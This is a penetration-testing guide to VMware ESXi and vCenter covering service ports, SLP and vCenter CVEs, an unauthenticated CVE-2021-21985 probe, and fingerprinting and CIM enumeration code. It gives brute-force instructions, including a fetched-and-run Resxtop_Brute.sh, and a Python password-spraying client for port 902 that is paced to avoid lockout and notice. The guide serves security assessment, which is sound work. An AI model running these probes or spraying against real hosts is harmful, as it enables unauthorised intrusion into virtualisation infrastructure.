Before getting into attacking and exploitation, it helps to know the difference between vSphere, vCenter and ESXi/ESX hosts.
VMware vSphere: VMware vSphere is the name given for the comprehensive virtualization platform that includes multiple software products and tools for creating, managing, and running virtual machines (VMs) on a physical server. It provides features like resource management, high availability, and centralized management.
vCenter Server: vCenter Server is a key component of the vSphere platform. It serves as a centralized management system that enables administrators to control and monitor multiple ESXi hosts and VMs. It offers features like VMotion, Distributed Resource Scheduler (DRS), and centralized management of virtual infrastructure.
ESXi (VMware vSphere Hypervisor): ESXi is a bare-metal hypervisor, a type 1 hypervisor installed directly on the physical server hardware. It provides the foundation for running VMs by managing the physical resources of the host, such as CPU, memory, storage and networking, while also supporting features like vMotion and High Availability (HA). An ESXi host is comparable to the VMware Workstation or VirtualBox installs we usually set up locally: it lets users create VMs on demand. vCenter Server, on the other hand, is a management console that can control and manage multiple ESXi hosts at once.
Reference Links
1. Soap API Guide
2. Ports and Services
3. vCenter Security Guide / ESXi Security
4. REST VAPI-HTTP Queries
5. vAPI REST API - New
Techniques
1. CVE-2021-21974 Exploit
2. VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors | Mandiant
3. Zero Day Initiative — CVE-2020-3992 & CVE-2021-21974: Pre-Auth Remote Code Execution in VMware ESXi
Common Ports
22 - SSH Access to ESXi Host
161 - SNMP
80, 443 - ESXi Web Server, Client connector/ ESXi Host Client
902 - VMware Authentication Daemon
3260 - iSCSI
5989 - CIM Broker
8000 - ESXi hosts listen on port 8000 for TCP connections from remote ESXi hosts for vMotion traffic
8080 - Used by the Storage Management Service (SMS) that is part of vCenter to access information about Virtual SAN storage profiles, capabilities, and compliance.
8889 - WS-Management for SOAP
8083, 8182, 8300, 9080, 9999 - vAPI-PicoHttp Service
Basics
- Fingerprint the web server on ports 443 and 80 to get the ESXi version
- Check whether port 22 is open: it gives access to the ESXi Shell. The default administrative account is root. Since ESXi 6.0 the Security.AccountLockFailures setting (default 5 failed attempts in current releases, with a 15-minute lock) applies to SSH and the vSphere Web Services SDK, so pace brute-force attempts accordingly; only the DCUI and the local ESXi Shell do not lock root out
- SSO may be enabled for the login
- Remote ESXCLI needs the vCenter Server root certificate (or the target's thumbprint); you can download the certificate once you know the vCenter address
- Inspect the ESXi host's HTTPS certificate on port 443: when VMCA issued it, the issuer DN names the vCenter Server (its FQDN appears in the O field), and that is where the root certificate can be downloaded
- Check for hosts below 7.0 U3 (multiple vulnerabilities)
- curl -kL https://esxi.fqdn/host -v - lists the host configuration files served by the /host endpoint (authentication required)
- Check whether TCP port 427 (SLP) is open on any host. After the patches for CVE-2020-3992 and CVE-2021-21974, the SLP service is only reachable locally (127.0.0.1 for IPv4, ::1 for IPv6)
CVEs
CVE-2019-5544(heap buffer overflow)
CVE-2020-3992(use after free)
CVE-2021-21974(heap buffer overflow)
CVE-2022-31699(heap buffer overflow)
VMware vCenter Server CVE-2021-21985 Remote Code Execution Vulnerability (vSAN Health Check plugin, reachable on vCenter port 443)
# Unauthenticated probe against the vSAN H5 plugin proxy. The target is the vCenter Server, not an ESXi host.
curl -s -k -X POST -H 'Host: <target>' -H 'User-Agent: curl' \
  -H 'Content-Type: application/json' \
  -H 'Connection: close' \
  --data-binary '{"methodInput":[{"type":"ClusterComputeResource","value":null,"serverGuid":null}]}' \
  https://vcenter.fqdn/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
Testing VMware API Access - Port 443
Go to https://github.com/Bhanunamikaze/VMwareAPIPentest or clone it:
git clone https://github.com/Bhanunamikaze/VMwareAPIPentest.git
# Run the command below to send a set of predefined SOAP queries to the given hosts and record whether each API call requires authentication
python3 ESXi_Soap_Pentest.py hosts.txt output.txt
# To test the queries manually, the SOAP requests are here:
raw.githubusercontent.com/Bhanunamikaze/VMwareAPIPentest/main/Soap_Queries.xml
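Fingerprinting the version over the SOAP API, added here as an example of the probe that the "fingerprint on port 443/80" item in Basics and the SOAP tests above rely on (this is my code, not the VMwareAPIPentest project's): RetrieveServiceContent is answered without a session by both hostd (ESXi) and vpxd (vCenter), and its <about> block carries the product, version, build and apiType, which also tells an ESXi host apart from a vCenter. The response and fault embedded for the offline test are constructed (the build number is made up), and the unversioned SOAPAction value is an assumption.

```python
import ssl
import sys
import urllib.request
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
VIM25 = "urn:vim25"

# RetrieveServiceContent needs no session: hostd and vpxd answer it before any
# Login call, which is what makes it usable as an unauthenticated fingerprint.
RETRIEVE_SERVICE_CONTENT = (
    '<soapenv:Envelope xmlns:soapenv="%s" xmlns:urn="%s">'
    "<soapenv:Body><urn:RetrieveServiceContent>"
    '<urn:_this type="ServiceInstance">ServiceInstance</urn:_this>'
    "</urn:RetrieveServiceContent></soapenv:Body></soapenv:Envelope>"
) % (SOAP_ENV, VIM25)

ABOUT_FIELDS = ("name", "fullName", "version", "build", "apiType", "apiVersion", "productLineId")


def parse_about(xml_bytes):
    """Return the <about> block of a RetrieveServiceContent response as a dict.

    A SOAP Fault raises RuntimeError carrying the server's faultcode/faultstring
    instead of failing later on a missing element.
    """
    root = ET.fromstring(xml_bytes)
    fault = root.find(".//{%s}Fault" % SOAP_ENV)
    if fault is not None:
        raise RuntimeError("SOAP fault %s: %s" % (
            fault.findtext("faultcode", default="?"), fault.findtext("faultstring", default="")))
    about = root.find(".//{%s}about" % VIM25)
    if about is None:
        raise RuntimeError("no <about> element in response; not a vSphere SOAP endpoint?")
    return {f: about.findtext("{%s}%s" % (VIM25, f), default="") for f in ABOUT_FIELDS}


def is_vcenter(about):
    """vpxd reports apiType 'VirtualCenter'; a host's hostd reports 'HostAgent'."""
    return about.get("apiType") == "VirtualCenter"


def version_tuple(version):
    """'7.0.3' -> (7, 0, 3), so releases can be compared numerically."""
    return tuple(int(p) for p in version.split(".") if p.isdigit())


def fingerprint(host, port=443, timeout=5.0):
    """POST RetrieveServiceContent to https://host:port/sdk and return the parsed about block.

    Certificate verification is disabled because targets usually present
    VMCA-signed or self-signed certificates; the request carries no credentials.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        "https://%s:%d/sdk" % (host, port),
        data=RETRIEVE_SERVICE_CONTENT.encode(),
        # Unversioned SOAPAction (assumption: the server then uses its default API version)
        headers={"Content-Type": "text/xml; charset=utf-8", "SOAPAction": VIM25},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return parse_about(resp.read())


# Constructed response in the shape hostd returns; the build number is made up.
SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<RetrieveServiceContentResponse xmlns="urn:vim25"><returnval>
<rootFolder type="Folder">ha-folder-root</rootFolder>
<about>
<name>VMware ESXi</name>
<fullName>VMware ESXi 7.0.3 build-12345678</fullName>
<vendor>VMware, Inc.</vendor>
<version>7.0.3</version>
<build>12345678</build>
<productLineId>embeddedEsx</productLineId>
<apiType>HostAgent</apiType>
<apiVersion>7.0.3.0</apiVersion>
</about>
</returnval></RetrieveServiceContentResponse>
</soapenv:Body>
</soapenv:Envelope>"""

# Constructed fault, the other shape the parser has to cope with.
SAMPLE_FAULT = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body><soapenv:Fault><faultcode>ServerFaultCode</faultcode>
<faultstring>Unsupported version URI</faultstring></soapenv:Fault></soapenv:Body>
</soapenv:Envelope>"""

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    about = fingerprint(target) if target else parse_about(SAMPLE_RESPONSE)
    kind = "vCenter" if is_vcenter(about) else "ESXi host"
    print("%s: %s (build %s, API %s)" % (kind, about["fullName"], about["build"], about["apiVersion"]))
    if not is_vcenter(about) and version_tuple(about["version"]) < (7, 0, 3):
        print("older than 7.0 U3: check the SLP and other advisories listed on this page")
```

Run it with a hostname to query a live target, or with no argument to parse the embedded sample. Compare the returned version against the "below 7.0 U3" item in Basics, and remember that a 7.0.3 version string alone does not tell you which update or patch level is installed; the build number does.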
Access ESXi Hosts Remotely
Register and download ESXCLI from here - the standalone ESXCLI works only against ESXi 7.0 and later
Basic Commands:
# Accessing using a config file
# Save the contents below into a file and pass it with --config
VI_PSC = XX.XXX.XXX.XX
VI_USERNAME = administrator@vsphere.local
VI_PASSWORD = admin_password
VI_PROTOCOL = https
VI_SERVER = my_vc
Example:
esxcli --config <my_saved_config> network ip interface list
# Direct connection to a host, trusting the downloaded vCenter root certificate
esxcli -s 10.10.10.10 --cacertsfile cert.0 system version get
# All-in-one command line, going through vCenter (--server) to one managed host (--vihost)
esxcli --server <vc_hostname_or_IP> --username <privileged_user> --password <password> --vihost <esxi_hostname_or_IP> <namespace> [<namespace>...] <command> --<option_name>=<option_value>
Bruteforce ESXi Hosts
pip install pyvmomi   # provides the pyVim module; "pip install pyVim" installs an unrelated package
git clone https://github.com/Bhanunamikaze/ESXiBrute.git
cd ESXiBrute
python ESXi_Brute.py --hosts hosts.txt --usernames usernames.txt --passwords passwords.txt --cert cert.pem [--output output.csv]
Reference: ESXiBrute
Note: The certificate comes from the vCenter UI (the vCenter IP address/hostname is in the issuer of the ESXi HTTPS certificate on port 443).
Bruteforce ESXi Hosts if you don't have the cert/hostname
Download and install VMware vSphere Resxtop - VMware {code}
# Add the resxtop shared libraries to the loader search path
export LD_LIBRARY_PATH=/usr/lib/vmware/resxtop/
wget raw.githubusercontent.com/Bhanunamikaze/ESXiBrute/main/Resxtop_Brute.sh
chmod +x Resxtop_Brute.sh
./Resxtop_Brute.sh hosts.txt usernames.txt passwords.txt
Reference: ESXiBrute
Get Stats from ESXi Hosts using Resxtop
Download from VMware vSphere Resxtop - VMware {code}
resxtop is a command-line utility that runs on Linux and gives a detailed, real-time view of how ESXi uses resources. Because it authenticates to the host, it can also be used to validate credentials you already have or to brute-force them.
# Add the resxtop shared libraries to the loader search path
export LD_LIBRARY_PATH=/usr/lib/vmware/resxtop/
# --server is the vCenter, --vihost the ESXi host
resxtop --server 10.10.10.10 -a --vihost 10.1.1.1
usage: resxtop [-h] [-v] [-b] [-s] [-a] [-c config file] [-d delay] [-n iterations]
[--server server-name [--vihost host-name]] [--portnumber socket-port] [--username user-name]
-h prints this help menu.
-v prints version.
-b enables batch mode.
-s enables secure mode.
-a show all statistics.
-c sets the esxtop configuration file, which by default is .esxtop60rc
-d sets the delay between updates in seconds.
-n runs resxtop for only n iterations. Use "-n infinity" to run resxtop forever.
--server remote server name.
--vihost esx host name, if --server specifies vc server.
--portnumber socket port, default is 443.
--username user name on the remote server.
Resolving ESXi Certificate Issue
When you run a command, ESXCLI first checks whether a certificate file is available. If not, it checks whether a thumbprint of the target server is available. If neither is, you get an error saying the certificate or thumbprint is not valid. To resolve this, download the vCenter root certificate.
Find the vCenter Server IP address/hostname, then follow the steps below.
# Download and install the vCenter Server certificate
1. Enter the URL of the vCenter Server system into a web browser.
2. Click the "Download trusted root CA certificates" link, or use the direct download link https://vcenter.domain.com/certs/download.zip
3. Verify that the extension of the downloaded file is .zip. The file is a ZIP archive of all certificates in the TRUSTED_ROOTS store.
4. Extract the ZIP file. A certificates folder is extracted. It contains files with the extensions .0, .1, and so on, which are the certificates, and files with the extensions .r0, .r1, and so on, which are the CRLs associated with those certificates.
5. Add the trusted root certificates to the list of trusted roots: pass the certificate via the --cacertsfile option or the VI_CACERTFILE variable, or pin the server with the --thumbprint option instead.
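Turning the TRUSTED_ROOTS export into a single CA bundle usable by --cacertsfile, pyvmomi's sslContext and requests' verify, as an added example (my code, not VMware's or the page author's) covering steps 2 to 5 above and the openssl conversion further down: it downloads certs/download.zip, walks the extracted folders, keeps the .0/.1 certificate files, skips the .r0/.r1 CRLs, converts any DER-encoded file to PEM with ssl.DER_cert_to_PEM_cert, and builds a verifying ssl context. The bootstrap download necessarily runs without verification, so confirm the vCenter address out of band first. The offline test uses constructed dummy files, not real certificates.

```python
import os
import re
import ssl
import urllib.request
import zipfile

# Files in the TRUSTED_ROOTS export: <hash>.0, <hash>.1, ... are certificates,
# <hash>.r0, <hash>.r1, ... are the matching CRLs (not needed for a CA bundle).
CERT_FILE = re.compile(r"\.\d+$")
CRL_FILE = re.compile(r"\.r\d+$")


def download_trusted_roots(vcenter, dest_dir, timeout=15.0):
    """Fetch https://<vcenter>/certs/download.zip and unpack it into dest_dir.

    Verification is off for this single request because its purpose is to
    obtain the CA that verifies everything afterwards.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    os.makedirs(dest_dir, exist_ok=True)
    zpath = os.path.join(dest_dir, "download.zip")
    url = "https://%s/certs/download.zip" % vcenter
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp, open(zpath, "wb") as fh:
        fh.write(resp.read())
    with zipfile.ZipFile(zpath) as zf:
        zf.extractall(dest_dir)
    return dest_dir


def to_pem(data):
    """Return PEM text for a certificate given either as PEM text or raw DER bytes."""
    if data.lstrip().startswith(b"-----BEGIN"):
        return data.decode("ascii").strip() + "\n"
    return ssl.DER_cert_to_PEM_cert(data)


def build_ca_bundle(cert_dir, bundle_path):
    """Concatenate every certificate file under cert_dir into one PEM file.

    Returns the number of certificates written. The same root may appear in
    more than one platform folder of the export; duplicates in a bundle are harmless.
    """
    count = 0
    with open(bundle_path, "w") as out:
        for root, _dirs, files in os.walk(cert_dir):
            for name in sorted(files):
                if CRL_FILE.search(name) or not CERT_FILE.search(name):
                    continue
                with open(os.path.join(root, name), "rb") as fh:
                    out.write(to_pem(fh.read()))
                count += 1
    return count


def verified_context(bundle_path):
    """ssl context trusting only the vCenter roots; pass it as sslContext= to pyvmomi."""
    return ssl.create_default_context(cafile=bundle_path)


if __name__ == "__main__":
    import sys
    vcenter, workdir = sys.argv[1], sys.argv[2]   # e.g. vcenter.domain.com ./vc-roots
    download_trusted_roots(vcenter, workdir)
    bundle = os.path.join(workdir, "vcenter-roots.pem")
    print("%d certificates written to %s" % (build_ca_bundle(workdir, bundle), bundle))
```

The resulting bundle is what `esxcli --cacertsfile`, `curl --cacert` and `ssl.create_default_context(cafile=...)` expect; if the host's certificate was replaced with one from an enterprise CA rather than VMCA, add that CA's certificate to the bundle as well.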
Port 443 - ESXi UI
#ESXi Login
https://esxi.fqdn/ui
#These files are exposed via the vSphere HTTPS-based file transfer API. These files should be monitored for modifications.
https://esxi.fqdn/host
Port 427 - SLP
It is a service discovery protocol that lets computers and other devices find services on a local area network (LAN) without prior configuration.
- Runs with root privileges (ESXi 5.5 and later)
- Enabled by default before ESXi 7.0 U2c
- After the patches for CVE-2020-3992 and CVE-2021-21974, the SLP service is only reachable locally (127.0.0.1 for IPv4, ::1 for IPv6)
- CVE-2022-31699 can be used to escape the sandbox on releases before ESXi 7.0 U2, especially ESXi 6.7
- From 7.0 U2, the SLP service runs inside a sandbox
- From 7.0 U2c, the SLP service is disabled by default
SLP Vulns:
CVE-2019-5544(heap buffer overflow)
CVE-2020-3992(use after free)
CVE-2021-21974(heap buffer overflow)
CVE-2022-31699(heap buffer overflow)
Port 902 - VMware Authentication Daemon
- Credentials can be brute-forced against port 902 using Metasploit
- Port 902 is open only where remote access is required
- Accepts Windows domain credentials when the host is joined to Active Directory; otherwise it authenticates local ESXi accounts
- Logins to this service are usually less monitored than RDP or SSH, which makes port 902 the preferred brute-force target
#Bruteforcing
msfconsole
use auxiliary/scanner/vmware/vmauthd_login
#Access - the banner arrives in cleartext; when it says "SSL Required", the client must upgrade the same connection to TLS before sending USER/PASS (the Metasploit module does this automatically, plain nc cannot)
nc 10.10.10.10 902
USER root
PASS toor
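The USER/PASS exchange on port 902 as a small Python client, added here as an example (my code, not the Metasploit module's): it reads the cleartext banner, upgrades the connection to TLS when the banner says SSL Required, sends USER and PASS, and classifies the reply by its FTP-style code (230 logged in, 530 rejected). The banner and reply lines in the offline test are constructed from the format the daemon prints; the intermediate 331 reply to USER is read and discarded rather than checked, which is an assumption about the dialogue.

```python
import socket
import ssl
import sys
import time


def parse_banner(line):
    """Parse the 220 greeting, e.g.
    '220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, ...'
    into the daemon version and whether TLS must be negotiated before USER/PASS.
    """
    code, _, rest = line.strip().partition(" ")
    if code != "220":
        raise RuntimeError("unexpected greeting from vmauthd: %r" % line.strip())
    version = rest.split("Version ", 1)[1].split(":", 1)[0] if "Version " in rest else ""
    return {"version": version, "ssl_required": "SSL Required" in rest, "raw": rest}


def classify_reply(line):
    """vmauthd answers PASS with an FTP-style code: 230 on success, 530 on bad credentials."""
    return {"230": "success", "530": "failure"}.get(line[:3], "unknown")


def _readline(sock):
    """Read one CRLF-terminated reply line from a plain or TLS-wrapped socket."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode("utf-8", "replace")


def vmauthd_login(host, user, password, port=902, timeout=5.0):
    """One USER/PASS attempt; returns (result, server_reply, banner_info).

    The banner is cleartext. If it advertises 'SSL Required' the same TCP
    connection is upgraded to TLS (STARTTLS-style) before USER is sent, which
    is why a plain nc session stalls after the banner.
    """
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        banner = parse_banner(_readline(sock))
        if banner["ssl_required"]:
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE  # hosts usually present VMCA or self-signed certs
            sock = ctx.wrap_socket(sock, server_hostname=host)
        sock.sendall(("USER %s\r\n" % user).encode())
        _readline(sock)                      # assumed 331 "Password required" reply, not checked
        sock.sendall(("PASS %s\r\n" % password).encode())
        reply = _readline(sock).strip()
        return classify_reply(reply), reply, banner
    finally:
        sock.close()


def spray(host, usernames, passwords, delay=1.0, **kw):
    """Try each username/password pair on its own connection; stop at the first success.

    The delay keeps the attempt rate low instead of producing an obvious burst.
    """
    for user in usernames:
        for pw in passwords:
            result, _reply, _banner = vmauthd_login(host, user, pw, **kw)
            if result == "success":
                return user, pw
            time.sleep(delay)
    return None


if __name__ == "__main__":
    target, user, pw = sys.argv[1], sys.argv[2], sys.argv[3]
    result, reply, banner = vmauthd_login(target, user, pw)
    print("vmauthd %s (ssl_required=%s): %s -> %s" % (banner["version"], banner["ssl_required"], result, reply))
```

Usage: `python3 vmauthd_client.py 10.10.10.10 root toor`. Anything other than 230/530 is reported as "unknown" rather than guessed, so a changed banner or an intermediate error is visible instead of being misread as a failed password.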
Port 161 - SNMP
- Check whether SNMP is enabled
- If SNMP is enabled, check for misconfiguration (for example, default community strings) and make sure the appropriate alerts are set up
Look for SNMP attacks here
Port 3260 - iSCSI
nmap -sV -Pn -p 3260 --script=iscsi-info 10.0.0.1
# Install iscsiadm
sudo apt install open-iscsi
# Discover the targets
iscsiadm -m discovery -t sendtargets -p 192.168.xx.xx
192.168.xx.xx:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
# Log in to a discovered target
iscsiadm -m node --targetname "iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 192.168.xx.xx --login
# Show the stored node record for the target
iscsiadm -m node --targetname "iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 192.168.xx.xx
Port 5989 - CIM Broker
Default user is root
# Accepts only POST requests
curl -kL https://10.10.10.10:5989 -X POST -u root:admin -v
curl -kL https://10.10.10.10:5989 -X POST --basic --user root -v --data '<?xml version="1.0" encoding="UTF-8"?>'
# Full request with headers and data. Note: the user:pass@host/namespace:Class URL form is wbemcli syntax; with curl the namespace and class are carried by the CIMObject header and the XML body. LMI_LANEndpoint is an OpenLMI (Linux) class; on ESXi query a class the host's broker provides, such as CIM_ComputerSystem.
curl -vvv --insecure 'https://user:pass@localhost:5989/root/cimv2:LMI_LANEndpoint' -H 'Content-type: application/xml; charset="utf-8"' -H 'CIMOperation: MethodCall' -H 'CIMMethod: EnumerateInstances' -H 'CIMObject: root/cimv2' -H 'Accept-Encoding: identity' -d '<?xml version="1.0" encoding="utf-8" ?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0"><SIMPLEREQ><IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH><IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="LMI_LANEndpoint"/></IPARAMVALUE><IPARAMVALUE NAME="LocalOnly"><VALUE>FALSE</VALUE></IPARAMVALUE></IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>'
# Vulnerabilities
ESXi 7.0.1, 6.7 and 6.5 have two vulnerabilities related to the CIM broker; refer to the VMware advisory.
# Using wbemcli
wget http://sourceforge.net/project/showfiles.php?group_id=128809
tar -xvf sblim-wbemcli-1.4.10.tar.gz
cd sblim-wbemcli-1.4.10
./configure
make
make install
wbemcli ei -noverify -dx 'https://user:pass@localhost:5989/root/cimv2:LMI_LANEndpoint'
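Building the EnumerateInstances call for any namespace and class and parsing the CIM-XML answer, as an added example (my code, not sfcb's, wbemcli's or the page author's). It generalizes the curl request above, posts to the broker's /cimom path (the CIM-XML-over-HTTP path; an assumption about the ESXi broker), and turns an <ERROR CODE=...> reply, such as the CIM_ERR_INVALID_CLASS you get when asking ESXi for a class it does not have, into a typed exception instead of silently returning no instances. The sample responses for the offline test are constructed.

```python
import base64
import ssl
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

# Intrinsic-method status codes a CIMOM puts in <ERROR CODE="n"> (DSP0200)
CIM_ERRORS = {
    1: "CIM_ERR_FAILED", 2: "CIM_ERR_ACCESS_DENIED", 3: "CIM_ERR_INVALID_NAMESPACE",
    4: "CIM_ERR_INVALID_PARAMETER", 5: "CIM_ERR_INVALID_CLASS", 6: "CIM_ERR_NOT_FOUND",
    7: "CIM_ERR_NOT_SUPPORTED",
}


class CIMError(Exception):
    """Raised for an <ERROR> reply from the broker or an HTTP 401 on the way there."""

    def __init__(self, code, description):
        super().__init__("%s (%d): %s" % (CIM_ERRORS.get(code, "CIM_ERR_UNKNOWN"), code, description))
        self.code = code


def build_enumerate_instances(namespace, classname, message_id="1001"):
    """Return (headers, body) for a CIM-XML EnumerateInstances call.

    namespace is slash-separated ("root/cimv2"); each component becomes one
    <NAMESPACE> element, the same layout the page's curl example uses.
    """
    ns_xml = "".join('<NAMESPACE NAME="%s"/>' % part for part in namespace.split("/"))
    body = (
        '<?xml version="1.0" encoding="utf-8" ?>'
        '<CIM CIMVERSION="2.0" DTDVERSION="2.0">'
        '<MESSAGE ID="%s" PROTOCOLVERSION="1.0"><SIMPLEREQ>'
        '<IMETHODCALL NAME="EnumerateInstances">'
        "<LOCALNAMESPACEPATH>%s</LOCALNAMESPACEPATH>"
        '<IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="%s"/></IPARAMVALUE>'
        '<IPARAMVALUE NAME="LocalOnly"><VALUE>FALSE</VALUE></IPARAMVALUE>'
        "</IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>"
    ) % (message_id, ns_xml, classname)
    headers = {
        "Content-Type": 'application/xml; charset="utf-8"',
        "CIMOperation": "MethodCall",
        "CIMMethod": "EnumerateInstances",
        "CIMObject": namespace,
    }
    return headers, body


def parse_enumerate_response(xml_text):
    """Return [{'class': ..., 'properties': {...}}, ...] from a SIMPLERSP, or raise CIMError."""
    root = ET.fromstring(xml_text)
    err = root.find(".//ERROR")
    if err is not None:
        raise CIMError(int(err.get("CODE", "1")), err.get("DESCRIPTION", ""))
    instances = []
    for inst in root.iter("INSTANCE"):
        props = {p.get("NAME"): p.findtext("VALUE") for p in inst.findall("PROPERTY")}
        for arr in inst.findall("PROPERTY.ARRAY"):
            props[arr.get("NAME")] = [v.text for v in arr.iter("VALUE")]
        instances.append({"class": inst.get("CLASSNAME"), "properties": props})
    return instances


def enumerate_instances(host, user, password, namespace="root/cimv2",
                        classname="CIM_ComputerSystem", port=5989, timeout=10.0):
    """POST the call to https://host:port/cimom with HTTP Basic auth and parse the reply."""
    headers, body = build_enumerate_instances(namespace, classname)
    headers["Authorization"] = "Basic " + base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # VMCA or self-signed certificate expected on the broker
    req = urllib.request.Request("https://%s:%d/cimom" % (host, port), data=body.encode(),
                                 headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return parse_enumerate_response(resp.read())
    except urllib.error.HTTPError as exc:
        if exc.code == 401:
            raise CIMError(2, "HTTP 401: credentials rejected by the CIM broker") from exc
        raise


# Constructed reply in the shape a broker returns; host names and values are made up.
SAMPLE_RESPONSE = (
    '<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0">'
    '<SIMPLERSP><IMETHODRESPONSE NAME="EnumerateInstances"><IRETURNVALUE>'
    '<VALUE.NAMEDINSTANCE><INSTANCENAME CLASSNAME="OMC_UnitaryComputerSystem">'
    '<KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">esxi01</KEYVALUE></KEYBINDING>'
    '</INSTANCENAME><INSTANCE CLASSNAME="OMC_UnitaryComputerSystem">'
    '<PROPERTY NAME="Name" TYPE="string"><VALUE>esxi01</VALUE></PROPERTY>'
    '<PROPERTY NAME="ElementName" TYPE="string"><VALUE>esxi01.example.internal</VALUE></PROPERTY>'
    '<PROPERTY.ARRAY NAME="Dedicated" TYPE="uint16"><VALUE.ARRAY><VALUE>0</VALUE></VALUE.ARRAY></PROPERTY.ARRAY>'
    "</INSTANCE></VALUE.NAMEDINSTANCE>"
    "</IRETURNVALUE></IMETHODRESPONSE></SIMPLERSP></MESSAGE></CIM>"
)
# Constructed error reply: what you get when asking for a class the host does not define.
SAMPLE_ERROR = (
    '<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0">'
    '<SIMPLERSP><IMETHODRESPONSE NAME="EnumerateInstances">'
    '<ERROR CODE="5" DESCRIPTION="CIM_ERR_INVALID_CLASS: LMI_LANEndpoint"/>'
    "</IMETHODRESPONSE></SIMPLERSP></MESSAGE></CIM>"
)

if __name__ == "__main__":
    if len(sys.argv) == 4:
        for inst in enumerate_instances(sys.argv[1], sys.argv[2], sys.argv[3]):
            print(inst["class"], inst["properties"].get("Name"))
    else:
        print(parse_enumerate_response(SAMPLE_RESPONSE))
```

Usage: `python3 cim_enum.py 10.10.10.10 root <password>`; pass a different namespace such as root/interop with CIM_RegisteredProfile to list the profiles the host implements. An HTTP 401 is surfaced as CIM_ERR_ACCESS_DENIED, so a credential check and a class check read the same way.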
Port 8889 - OpenWSMan
# The service answers with WWW-Authenticate: Basic realm="OPENWSMAN"; try Basic auth against it
curl -kL http://10.10.10.10:8889 -X POST -u root:root
Connecting to ESXi Host using API
You will need the vCenter certificate to pass the first level of authentication; download it from https://vcenter.domain.com/certs/download.zip
# Once you have the certificate, convert it to a .pem file (add -inform DER if the input is binary rather than PEM)
openssl x509 -in your_certificate.crt -out your_certificate.pem -outform PEM
# Install the required packages and libraries using the commands below
# Install venv
sudo apt install python3-venv
# Create a new virtual env
python3 -m venv .venv/project_name
# Activate the virtual env
source .venv/project_name/bin/activate
git clone https://github.com/vmware/pyvmomi.git
cd pyvmomi && pip install . && cd ..
git clone https://github.com/vmware/vsphere-automation-sdk-python.git
cd vsphere-automation-sdk-python
pip install -U lib/*/*.whl
pip install -U .
#Code to connect to a VMware ESXi host
import ssl
from pyVim import connect

# ESXi host connection details
host = "hostname.domain.com"
user = "your_username"
password = "your_password"
cert_path = "new.pem"   # vCenter root certificate in PEM form

# Verify the host's certificate against the downloaded vCenter root
ssl_context = ssl.create_default_context(cafile=cert_path)

# Connect to the ESXi host
try:
    service_instance = connect.SmartConnect(
        host=host,
        user=user,
        pwd=password,
        port=443,
        sslContext=ssl_context,
    )
    print("Connected to ESXi host:", host)
    # Perform actions here
    # Disconnect from the ESXi host
    connect.Disconnect(service_instance)
    print("Disconnected from ESXi host:", host)
except Exception as e:
    print("Error:", e)
#Code to connect to VMware vCenter
import requests
import urllib3
from vmware.vapi.vsphere.client import create_vsphere_client

session = requests.session()
# Certificate verification is disabled here; point session.verify at the PEM bundle instead if you have it
session.verify = False
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Connect to a vCenter Server using username and password
vsphere_client = create_vsphere_client(server='10.10.10.10', username='root', password='root', session=session)

# List all VMs inside the vCenter Server
for vm in vsphere_client.vcenter.VM.list():
    print(vm.vm, vm.name, vm.power_state)
Script to Test Many Hosts at Once
# Put the details below in a config file, with your own credentials and address
VI_SERVER = esxi_server_a
VI_USERNAME = root
VI_PASSWORD = toor
# Create a new .sh file with the script below and update the esxcli command as per your automation
#!/bin/bash
VI_CONFIG_FILE=/home/admin/viconfig
VIHOSTS=(esxi_server_a esx_server_b esxi_server_c)
for VIHOST in "${VIHOSTS[@]}"
do
    echo "Adding NAS datastore for ${VIHOST} ..."
    # --server overrides VI_SERVER from the config file; --host is the NAS server, not the ESXi host
    esxcli --config "${VI_CONFIG_FILE}" --server "${VIHOST}" storage nfs add --host <nas_server> --share <share point> --volume-name <volume name>
    esxcli --config "${VI_CONFIG_FILE}" --server "${VIHOST}" storage nfs list
done